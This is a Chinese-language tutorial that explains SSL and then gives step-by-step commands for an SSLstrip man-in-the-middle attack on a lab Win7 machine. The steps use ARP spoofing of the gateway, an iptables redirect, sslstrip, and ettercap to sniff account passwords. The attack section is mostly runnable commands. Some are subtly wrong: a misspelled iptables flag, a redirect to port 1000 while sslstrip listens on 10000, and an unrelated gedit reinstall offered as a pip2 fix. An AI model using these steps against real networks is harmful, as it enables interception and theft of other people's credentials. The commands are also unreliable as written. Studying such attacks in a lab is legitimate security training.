一:SSL原理
SSL的作用是为了传输一些敏感信息(比如凭证账号密码)提供安全可靠的保障,确保用户使用浏览器和服务器之间传输的数据是安全可信的
当我们访问HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并且附带证书验证,在得到双方证书有效后,两者开始SSL安全通信
二:实战
原理:使用SSLstrip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文通信,kali能够截获明文数据。另一方面kali进行路由转发,和原本win7要连接的服务器进行正常的https通信
工具sslstrip:kali2020是没有安装的,需要自行安装,参考后面的步骤
1.开启路由器转发(终端1)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
2.开启iptables规则(终端2)
iptables -t nat -A PREROUTING -p tcp --destion-port 80 -j REDIRECT --to-port 1000
作用:在kali中实现从win7靶机截获的HTTP流量转发到SSLstrip中,并在10000端口上运行SSLstrip,实现win7原来要访问的远程服务器建立https(ssl)通信
3.ARP双向欺骗(冒充网关)
终端1:
arpspoof -i eth0 -t 192.168.1.183 192.168.1.1
终端2:
arpspoof -i eth0 -t 192.168.1.1 192.168.1.183
4.安装sslstrip套件工具(终端3)
git clone https://github.com/moxie0/sslstrip.git
(1)进入sslstrip文件目录,找到setup.py安装文件
cd sslstrip
(2)安装setup.py
python2 setup.py install
(3)继续安装模块(此时可能提示找不到pip2,下面有讲解)此时可能会因断开连接,多试几次,还是不行就去官网下载
pip2 install twisted
(4)安装第二个模块
pip2 install service_identity
(5)开启攻击:
sslstrip -l 10000
5.靶机登录https类型网页、
6.嗅探账号密码(终端4)
ettercap -Tq -i eth0
如果找不到pip2
sudo apt-get remove gedit
sudo apt-get install gedit(提示路径不对)
export PATH=/home/cyd/.local/bin/:$PATH(这个根据提示来)